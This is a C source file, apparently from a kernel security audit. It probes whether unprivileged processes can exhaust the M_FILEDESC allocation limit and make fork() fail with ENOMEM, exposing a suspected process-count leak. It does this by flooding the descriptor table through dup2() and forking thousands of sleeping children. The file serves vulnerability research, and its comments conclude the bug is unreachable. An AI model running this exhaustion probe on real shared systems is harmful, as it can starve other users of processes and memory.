DF-0032 / exhaust.c
/*
 * DF-0032 instrumented exhaustion probe.
 *
 * GOAL: Determine whether fork()'s RFFDG path can be made to return ENOMEM
 * (the exact signature of the fdcopy()-failure leak in fork1(), kern_fork.c:553)
 * from an UNPRIVILEGED user, and how close we can push the M_FILEDESC
 * per-type ks_limit before RLIMIT_NPROC (EAGAIN) stops us.
 *
 * MODEL UNDER TEST (traced in sys/):
 *  - fdcopy() returns -1 only when its M_NULLOK kmalloc of sizeof(struct
 *    filedesc) fails (kern_descrip.c:2481-2486). That kmalloc returns NULL
 *    only when M_FILEDESC's per-type memuse >= ks_limit
 *    (kern_slaballoc.c:863-879). ks_limit = kmem_lim_size()/10 = ~195MB here.
 *  - fork1() maps that failure to ENOMEM (kern_fork.c:553) and leaks nprocs.
 *  - The fd_files[] array allocation inside fdcopy() is M_WAITOK (no M_NULLOK)
 *    at kern_descrip.c:2504-2505, so it would PANIC the kernel at
 *    kern_slaballoc.c:877 on limit exhaustion rather than return NULL.
 *
 * Therefore: to see fork()==ENOMEM (the leak), M_FILEDESC usage must ALREADY be
 * >= ks_limit before the newfdp kmalloc; but crossing that limit is dominated
 * by the large M_WAITOK fd_files array, which panics first. This probe
 * empirically confirms: we cannot get M_FILEDESC near 195MB from an
 * unprivileged uid before RLIMIT_NPROC (EAGAIN) caps us, and no ENOMEM occurs.
 *
 * Exit status: 0 = no ENOMEM observed, 2 = fork() returned ENOMEM at least
 * once, 1 = setup failure (could not open /dev/null).
 *
 * Build: cc -o exhaust exhaust.c
 * Run:   ./exhaust
 */
#include <sys/resource.h>
#include <sys/wait.h>
#include <signal.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

/* Tunables of the probe, named so the loops below read without magic numbers. */
enum {
    FD_STEP       = 64,    /* stride between dup2() targets */
    FD_TARGET     = 15000, /* highest fd number we try to occupy */
    FD_SLOT_BYTES = 16,    /* per-slot size used for the printed KB estimate */
    MAX_FORKS     = 4000,  /* upper bound on fork() attempts */
    EAGAIN_STOP   = 50     /* give up once more than this many EAGAINs seen */
};

/* Pids of the children we successfully forked, so cleanup can target them. */
static pid_t children[MAX_FORKS];

/*
 * Return the current (soft) RLIMIT_NPROC value as a long, or -1 if
 * getrlimit() fails.
 */
static long
maxprocperuid(void)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_NPROC, &rl) == 0) {
        return (long)rl.rlim_cur;
    }
    return -1;
}

/*
 * Duplicate src_fd onto every FD_STEP-th descriptor up to FD_TARGET.
 *
 * Returns the highest descriptor that was actually created (0 if none).
 * Stops at the first dup2() failure and reports why, so the caller's size
 * estimate is based on a descriptor that really exists.
 */
static int
grow_fd_table(int src_fd)
{
    int highest = 0;

    for (int fd = FD_STEP; fd <= FD_TARGET; fd += FD_STEP) {
        if (dup2(src_fd, fd) < 0) {
            fprintf(stderr, "[!] dup2(%d, %d) failed: %s\n",
                    src_fd, fd, strerror(errno));
            break;
        }
        highest = fd;
    }
    return highest;
}

/*
 * Dump kernel malloc and memory statistics via vmstat at the moment the
 * first ENOMEM is seen. nchildren is the number of live children so far.
 * Best effort: the system() results are deliberately ignored.
 */
static void
report_first_enomem(int nchildren)
{
    fprintf(stderr,
            "[!!!] ENOMEM from fork() -- fdcopy failure leak TRIGGERED at child %d\n",
            nchildren);

    /* Self-report the kernel malloc state at the exact leak moment. */
    fprintf(stderr, "[*] M_FILEDESC/M_PROC/M_SUBPROC state at first ENOMEM:\n");
    fflush(stderr);
    (void)system("vmstat -m 2>/dev/null | grep -E '^[[:space:]]+(proc|lwp|subproc|file_desc)[[:space:]]' "
                 "|| vmstat -m | grep -E 'proc|file_desc'");

    /* also report swap/free via vmstat (1 line) */
    fprintf(stderr, "[*] memory at first ENOMEM:\n");
    fflush(stderr);
    (void)system("vmstat -c 1 2>/dev/null | head -3 || vmstat | head -3");
}

/*
 * Terminate and reap the first `count` pids in `pids`.
 *
 * Each child is signalled individually. Signalling the whole process group
 * (kill(0, ...)) would also deliver SIGTERM to this process and to anything
 * else sharing the group, killing the probe before it can return its status.
 */
static void
reap_children(const pid_t *pids, int count)
{
    for (int i = 0; i < count; i++) {
        (void)kill(pids[i], SIGTERM);
    }

    for (;;) {
        if (waitpid(-1, NULL, 0) > 0) {
            continue;
        }
        if (errno == EINTR) {
            continue; /* interrupted, not finished: keep reaping */
        }
        break; /* ECHILD (or another hard error): nothing left to wait for */
    }
}

/*
 * Probe driver: grow our fd table, fork sleeping children until the kernel
 * refuses, classify each fork() failure by errno, print a summary, clean up.
 */
int
main(void)
{
    long nproc_limit = maxprocperuid();
    int eagain = 0, enomem = 0, ok = 0, other = 0;

    fprintf(stderr, "[*] RLIMIT_NPROC(cur) = %ld\n", nproc_limit);
    fprintf(stderr, "[*] Phase 1: grow this proc's fd_files[] table via dup2()\n");

    /* Grow our own fd table to near the per-proc cap so each fork()'s fdcopy
     * allocates a large (~256KB) M_FILEDESC fd_files array in the child. */
    int devnull = open("/dev/null", O_RDWR);
    if (devnull < 0) {
        perror("open /dev/null");
        return 1;
    }

    /* kern.maxfilesperproc is typically 16144; FD_TARGET stays under that. */
    int high_fd = grow_fd_table(devnull);
    fprintf(stderr, "[*] grew fd table to fd=%d (fd_files[] ~%dKB per fdcopy)\n",
            high_fd, (high_fd * FD_SLOT_BYTES) / 1024);

    fprintf(stderr, "[*] Phase 2: fork() children (RFFDG) to accumulate M_FILEDESC\n");
    fprintf(stderr, "[*] watching for fork()==ENOMEM (the fdcopy-failure leak marker)\n");

    /* Fork as many children as RLIMIT_NPROC allows; children sleep holding
     * their fd tables so M_FILEDESC accumulates. */
    for (int i = 0; i < MAX_FORKS; i++) {
        pid_t pid = fork();

        if (pid == 0) {
            pause();
            _exit(0);
        }
        if (pid > 0) {
            /* ok < MAX_FORKS here: at most one success per iteration. */
            children[ok++] = pid;
            continue;
        }

        /* Snapshot errno before any library call can overwrite it. */
        int err = errno;

        if (err == EAGAIN) {
            eagain++;
            if (eagain == 1) {
                fprintf(stderr,
                        "[!] first EAGAIN after %d children (RLIMIT_NPROC / maxproc)\n",
                        ok);
            }
        } else if (err == ENOMEM) {
            enomem++;
            if (enomem == 1) {
                report_first_enomem(ok);
            }
        } else {
            other++;
            if (other == 1) {
                fprintf(stderr, "[?] unexpected errno=%d (%s)\n",
                        err, strerror(err));
            }
        }

        if (eagain > EAGAIN_STOP) {
            break; /* stop once capped */
        }
    }

    fprintf(stderr, "[*] summary: ok=%d eagain=%d enomem=%d other=%d\n",
            ok, eagain, enomem, other);
    if (enomem > 0) {
        fprintf(stderr, "[!!!] BUG TRIGGERED: fork() returned ENOMEM (fdcopy failure)\n");
    } else {
        fprintf(stderr, "[*] NO ENOMEM observed -- fdcopy never failed.\n"
                        "    (M_FILEDESC did not reach its ~195MB ks_limit before RLIMIT_NPROC capped forks.)\n");
    }

    /* cleanup: kill exactly the children we created, then reap them */
    reap_children(children, ok);

    return (enomem > 0) ? 2 : 0;
}